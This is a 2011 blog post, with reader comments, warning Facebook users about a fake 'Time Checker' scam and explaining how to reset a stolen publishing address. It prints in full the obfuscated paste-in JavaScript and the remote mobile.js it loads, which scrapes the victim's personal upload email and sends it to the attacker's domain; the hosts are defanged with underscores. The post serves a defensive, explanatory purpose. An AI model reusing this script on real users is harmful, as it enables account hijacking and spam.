Protect yourself against fraud & identity theft on Facebook – FAKE Facebook Time Checker !

HERE IS HOW MY FACEBOOK PERSONAL PUBLISHING ADDRESS GOT STOLEN:
Update 2011.01.25 – For a complete German language translation you can visit Elias’s blog.

( Using it’s personal publishing address a Facebook user can post pictures and messages by directly sending and email to this address. If someone knows your personal publishing address it can impersonate your and post messages and pictures without your consent, or without you even knowing. This can be very well used by ill intended persons to spam Facebook beyond usability. )

I recently ( 2011.01.18 – around 00:00, GMT )  clicked a link send by a friend of mine on Facebook and … i eventually did do what they said me to do. I was a little bit tired and not very attentive at the job in hand.

The link looked like: ” Ive spent over 132 hours on facebook in my lifetime! Wow that\’s a lot of time wasted! Find out how much time you\’ve spent on facebook here – http://g_o_o.gl/AYkjm” ( _” in the website name is intentionally added by me here and into the following links to prevent unintentional clicking ). This shortened address “http://goo.gl/A_Y_k_j_m” forwarded me to “http://www.n_e_w_s_1_7_c_h_a_n_n_e_l.com/time/next.php?id=SCiGm_d“. This page I arrived to was called “Facebook Time Checker“.  The page was pretending that by doing some “browser magic” i would get as result the amount of time that i have spent on Facebook!

IT IS NOT TRUE ! ONLY FACEBOOK KNOWS THIS THING AND IS NOT PUBLIC !
IT’S JUST A GOOD PRETEXT FOR A THIRD PARTY TO STEAL YOUR PRIVATE INFORMATION !

They advised me to copy paste this Javascript into by browser to check the time i have spent on Facebook up to now.

Here is the Javascript ( DON’T EVEN THINK TO COPY PASTE THIS INTO YOUR BROWSER )

javascript:var _0xbdfc=[
“\x73\x63\x72\x69\x70\x74”,
“\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74”,
“\x73\x72\x63”,
“\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77
\x2e\x6e\x65\x77\x73\x31\x37\x63\x68\x61
\x6e\x6e\x65\x6c\x2e\x63\x6f\x6d\x2f\x74
\x69\x6d\x65\x2f\x6d\x6f\x62\x69\x6c\x65
\x2e\x6a\x73”,
“\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64”,
“\x62\x6F\x64\x79”
];
var script=document[_0xbdfc[1]](_0xbdfc[0]);
script[_0xbdfc[2]]=_0xbdfc[3];
document[_0xbdfc[5]][_0xbdfc[4]](script);
void(0);

I did as they said mostly because i was doing things mechanically at that time…

Then i realised that maybe i did something bad  so i started checking what the script was doing.

First i have translated the script into a human readable form:

javascript:var _0xbdfc=[
“scipt”,
“createElement”,
“src”,
“http://www.n_e_w_s_1_7_c_h_a_n_n_e_l.com/time/mobile.js”,
“appendChild”,
“body”
];
var script=document[_0xbdfc[1]](_0xbdfc[0]);
script[_0xbdfc[2]]=_0xbdfc[3];
document[_0xbdfc[5]][_0xbdfc[4]](script);
void(0);

Obviously this appends a java script file located on that remote server to our current session.

Let’s check the mobile.js file:

	//Append jquery library
	var newjs = document.createElement('script');
	newjs.setAttribute('src', 'http://s_o_c_i_a_l_g_i_f_t_s.info/jquery.js');
	document.body.appendChild(newjs);
	setTimeout(function(){
		//Grab post form id and other stuff for posting
		if(location.href == "http://www.n_e_w_s_1_7_c_h_a_n_n_e_l.com/time/index.php")
		{
			alert("Wrong Page. You must paste the script into your browser's\n
                                address bar on any facebook tab or window.\n\n Then Hit Enter!");
			return;
		}
		var uid     = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
		//grab mobiles
		$.get("http://m.facebook.com/upload.php", function(data){
			var mydata = data;
			var mobiles;
			var count = 0;
			$($(mydata).find('a').filter(':contains("m.facebook.com")')).
                        each(function(){if(($(this).text() != undefined)){ mobiles += $(this).text() +";";}});
			var clean = mobiles.replace("undefined","");
			var cut = clean.slice(0,clean.length - 1);
			var insert = cut.replace(/;/g,",");
			//Redirect to php inserter which redirects back to next set of steps.
			top.location.href = 'http://www.n_e_w_s_1_7_c_h_a_n_n_e_l.com/
                        time/check.php?get=1&m=,'+insert;
		});
	},2000);
	alert("Time Checker Processing - Please wait 2 seconds and click OK to view results.");

By looking at this file we can immediately recognize that the script will load your uploads.php Mobile Facebook page and then harvest the text between the “m.facebook.com” text.

The text contains your personal upload email.

The last thing the script does is that it sends this email back to the third party website.

They now control your Facebook! Using this email they can post anything to your Facebook page without your permission !!

If by mistake, you, like me, already did all the stuff you are not suppose to be doing … you need to:

!!! GO TO YOUR http://m.facebook.com/upload.php PAGE AND RESET YOUR PERSONAL PUBLISHING ADDRESS !!!

By resetting the address Facebook generates a new one for you ! It’s OK because the attacher has no way to find out your new publishing address!

I really hope people read this in time not to “F”word their Facebook ! If you know other websites hosting this type of attack please let us know ( comments are welcome ). Below is a list with such websites ( “_” added to prevent the risks of an unintentional click ):

  • http://www.n_e_w_s_1_7_c_h_a_n_n_e_l.com/
  • http://2_2_0.1_1_2.3_6.1_7_8/

UPDATES

2011.01.23 – Seems also German Facebook users are tricked in using this javascript and probably much more users with different languages. In this case if someone has the ability to translate this post into other languages so that others can read this in their mother language we welcome his help. Please let me know if there are such translations and provide us with the appropriate link. I hereby permit anyone to translate the content of this post as long as it’s placing a link to this page in the translated version.
2011.01.24 – Serbian users are also tricked into using a different form of script. I have dedicated another post for this one. The principle is the same. One would insert a JavaScript into browser address bar that loads in turn another more potent script. Searching for internet for more references i have found that this scripts are not so new as i thought they are. The only problem is that this social websites are making this scripts viral. I guess Facebook should implement some system to filter this scripts automatically. It can check the posts of it’s users by some patterns and check also the links their users provide for remains of such scripts. As i know about their Copyright policy they own the rights to do whatever they want with the users content… so this can be no problem whatsoever.
2011.01.25 Elias made an complete translation of my post in German language here. Thanks!

Share

Tags: , , , , , , ,

27 Responses to “Protect yourself against fraud & identity theft on Facebook – FAKE Facebook Time Checker !”

  1. HN Says:
    January 19th, 2011 at 5:35 am

    Hi there,

    I have done exactly the same thing as you….and fortunately you are the first one who dealt with the problem.
    I also followed the steps you said, but my problem is, that i can’t reset the publishing address to “zero” but Facebook just generates a new one. Do you have any solution for that?
    Or is there a possibility where i could enter my new publishing address instead of resetting it?!

    Thanks in advance!

  2. mas Says:
    January 21st, 2011 at 5:00 pm

    Thank you very very much for this Dan!!
    I also did this, and then i got this spam messages in my profile.
    Now I did a reset of my mobilephone-upload address and i hope it will work 😉

    So thank you, you are the best!

  3. willie Says:
    January 21st, 2011 at 5:55 pm

    Today some friends posted this rubbish in german FB and I searched for
    a) the problem
    b) the solution

    I found both! :))

    The mobile.js changed it’s location to China: http://2_2_0.1_1_2.3_6.1_7_8/ and we have german js-messages, too.

    The “social gift” (in german: “social poison” 😉 lasts.

    Many thanks!

  4. Dan Says:
    January 22nd, 2011 at 10:48 am

    HN,
    as long as you have generated a new Facebook publishing email address the problem is solved ! I think you cannot disable this option yet but the attacher has no way knowing your new address as long as you don’t use their script !

    Regards,
    Dan

    Hi there,

    I have done exactly the same thing as you….and fortunately you are the first one who dealt with the problem.

    I also followed the steps you said, but my problem is, that i can’t reset the publishing address to “zero” but Facebook just generates a new one. Do you have any solution for that?

    Or is there a possibility where i could enter my new publishing address instead of resetting it?!

    Thanks in advance!

  5. vinz Says:
    January 23rd, 2011 at 7:30 am

    http://2_2_0.1_1_2.3_6.1_7_8/~biznews2/time/next.php?id=gTttGd

    but luckily i googled the script before i copy&pasted it 😉

  6. Andrea Mayer-Edoloeyi Says:
    January 23rd, 2011 at 3:04 pm

    Thank you very much!

  7. John Says:
    January 23rd, 2011 at 3:09 pm

    Thank you very much for this!!
    But I have a question. I pasted the script into the default Facebook home (www.facebook.com) and not into the m.facebook.com one.
    Does it saves me from the scam?

  8. » Nur, damit das auch bekannt wird. Diese Fratzenb … Nachtwächter-Blah Says:
    January 23rd, 2011 at 4:07 pm

    […] Fratzenbuch-Äpp, die angeblich feststellt, wieviel Zeit man im Fratzenbuch verbracht hat, ist eine üble Malware. Wer diesen Müll bei sich verbastelt hat, der hat ein paar Spammern oder noch üblerem […]

  9. Tweets that mention Useful for me » Blog Archive » Protect yourself against fraud & identity theft on Facebook – FAKE Facebook Time Checker ! -- Topsy.com Says:
    January 23rd, 2011 at 4:54 pm

    […] This post was mentioned on Twitter by Niels Heidenreich and Elias Schwerdtfeger, Michael Witkowski. Michael Witkowski said: Protect yourself against fraud & identity theft on Facebook – FAKE Facebook Time Checker ! http://j.mp/hasSJg via @AddToAny […]

  10. Vorsicht, Facebook Fraud! » Facebook, Posting, Profil, Publishing, Adresse, Page » DIGITAL AFFAIRS Says:
    January 23rd, 2011 at 5:21 pm

    […] So fängt man sich das ach so lustige Posting mit der blauen Facebook Uhr und dem Text “I’ve spent over 27 hours on facebook in my lifetime! Wow that’s a lot of time wasted!…” – und so wird man das Posting los und verhindert, dass nochmal Spam via Facebook Mobile Publishing Adresse gepostet wird. […]

  11. Dan Says:
    January 23rd, 2011 at 11:45 pm

    No ! as long as you are logged in into Facebook using that browser the scam works 🙁
    The script loads the mobile version without you even knowing it!

    Dan

    Thank you very much for this!!

    But I have a question. I pasted the script into the default Facebook home (www.facebook.com) and not into the m.facebook.com one.

    Does it saves me from the scam?

  12. Üble JavaScript-Schadsoftware für Facebook « Unser täglich Spam Says:
    January 24th, 2011 at 8:46 am

    […] folgende Text ist eine schnelle Übertragung eines englischsprachigen Textes im Blog „Useful for me“. Die Publikation einer Übersetzung ist dort ausdrücklich gestattet, und weil diese […]

  13. Elias Says:
    January 24th, 2011 at 8:52 am

    I made a complete translation of your post in german language together with some annotations for the less technical literates.

    Thanks for your great post!

  14. Patricia Says:
    January 26th, 2011 at 9:03 am

    If I reset the personal publishing address, do I have to do anything on an Android phone that has my FB app on it, too?

  15. Simon Says:
    January 27th, 2011 at 6:15 am

    Thanks for the help man!!

  16. Dan Says:
    January 27th, 2011 at 9:30 pm

    If I reset the personal publishing address, do I have to do anything on an Android phone that has my FB app on it, too?

    If you have used by mistake exactly this script then just resetting your personal publishing address is enough.
    Your Android/iPhone app is not affected by this in any.

  17. Valraven Says:
    January 29th, 2011 at 2:33 am

    Hello,

    Ahem, thank you. Really useful

  18. UWAGA SPAM - Socjomania Says:
    February 14th, 2011 at 3:07 am

    […] potrzebne dane i ruszyłem na poszukiwanie rozwiązania w Googlach.Z pomocą przyszedł blog Use ful for me, który opisał podobny sposób wykradania informacji z Facebooka. Zostanie fanem aplikacji oraz […]

  19. timovanmoke Says:
    February 15th, 2011 at 10:15 am

    Hey,

    thanks a lot for your solution, it already worked out for my personal page.
    but what about fan pages i’m admin of? i’ve got a fanpage with 4 different persons as admins. unfortunately i was the only one that clicked on that shit. anyway..

    i already cut me off as admin, but the script is still posting to my fanpage.
    so is there another mobile adress for fanpages?
    maybe you’ve got any ideas.

    thanks a lot!

  20. Simon Munk Says:
    February 15th, 2011 at 8:51 pm

    Thank you very much! have been looking for a solution for a long time.

    Regards Simon

  21. debasishgang7 Says:
    February 20th, 2011 at 4:23 am

    Great article..I want to know can i decode Java script obfuscated code ???

  22. Dan Says:
    February 22nd, 2011 at 8:43 am

    Can u give me a more specific example of code ? I am not very familiar with JavaScript obfuscation but, because Java is a high level language that will compile in a high level form it should not be so hard to reverse parts of the code you need.

  23. arash Says:
    April 11th, 2011 at 2:55 pm

    I have same problem:
    One of my friend taged me in this post “wtf guys, you appeared as the people who stalked me the most, you can see yours at http://zxc.fbglitch-b.info/?p3j9xhk” , i went there and i did things , now automatically my account send spams and messages to my friends!!!

  24. arash Says:
    April 11th, 2011 at 3:17 pm

    Thank you Dan, i will translate this post 2 Persian 🙂

  25. workplace theft Says:
    September 19th, 2011 at 5:04 am

    Hi there very cool web site!! Man .. Beautiful .. Superb .. I will bookmark your blog and take the feeds also?I am happy to search out so many useful information right here in the post, we want work out extra techniques in this regard, thank you for sharing. . . . . .

  26. emoticons do facebook Says:
    November 21st, 2011 at 2:50 pm

    Remarkable issues here. I’m very glad to peer your article. Thanks so much and I am taking a look forward to contact you. Will you please drop me a mail?

  27. Mark Says:
    January 14th, 2012 at 10:29 am

    I can not see where you can reset your personal publishing address. Have they remove this ability?

Leave a Reply